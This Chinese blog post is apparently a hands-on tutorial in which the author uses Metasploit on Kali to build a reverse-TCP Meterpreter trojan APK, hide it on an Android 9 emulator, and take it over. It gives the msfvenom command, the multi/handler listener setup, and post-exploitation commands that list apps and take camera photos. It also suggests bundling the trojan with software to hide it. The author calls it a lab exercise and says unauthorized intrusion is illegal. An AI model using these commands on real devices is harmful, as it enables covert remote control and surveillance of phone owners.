目录
一、前言
 刚进行过黑客渗透的 George 激情澎湃,决定写一篇 优快云 记录一下,谨以纪念!MSF
,全称为Metasploit Framework
,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透
。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下
的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透
,所以这种方法很难进行违法渗透!
二、演示环境
攻击主机
:虚拟机 kali IP:192.168.147.129
靶机
:联想模拟器 安卓9
三、渗透过程
(一)查询虚拟机中kali的IP
George先在终端
中输入ifconfig
查询了自己虚拟机中kali的ip地址,如下图,可知ip为192.168.147.129
(二)使用root权限
George先在终端输入su root
,输入自己的密码,使用root权限
,然后在此权限下进行以下操作。
(三)生成木马
这个木马
是放在靶机
上的,目的是与攻击主机
进行连接,使攻击主机
控制靶机
,为了隐蔽,我们可以把木马
与软件或网站链接
捆绑在一起,神不知鬼不觉地使木马
在靶机
上运行起来,这也就是为什么尽量不要在第三方网站下载破解软件,不要随便点击不明网站的原因。这里George为了追求方便,就直接裸木马
输入msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.147.129 LPORT=6666 R >木马.apk
(这里的 LHOST换成自己kali的ip,LPORT换成一个没被占用的端口,后面的木马安装包apk的名称自定义)生成的安装包apk会默认生成在桌面的主文件夹
中,并把此木马放在靶机
上(在靶机上安装后软件名默认为MainActivity),先不要运行,如下图:
(四)打开MSF
George继续在终端输入msfconsole
打开SF`(这里打开之后显示的图案是随机的)
(五)配置攻击载荷
George接着在终端中输入以下命令进行配置(一条一条输入)
use exploit/multi/handler //选择模块
set payload android/meterpreter/reverse_tcp //选择攻击模块
set LHOST 192.168.147.129 //与你自己kali的IP保持一致
set LPORT 6666 //与你之前设置的端口保持一致
(六)运行
配置完之后George输入run
运行,然后双击靶机
上的木马
,使它在靶机上运行,出现类似如下图,则代表渗透成功:
(七)控制靶机的指令(示例,更多详见开头指的两篇教程文章)
1、查看对方手机系统信息
命令:sysinfo
2、查看对方手机安装哪些app文件
命令:app_list
3、控制摄像头拍摄一张照片
注意:要先给虚拟机摄像头权限,安装上相机,有前置摄像头开关的电脑要打开它
命令:webcam_snap
(也是成功拍到了我的键盘)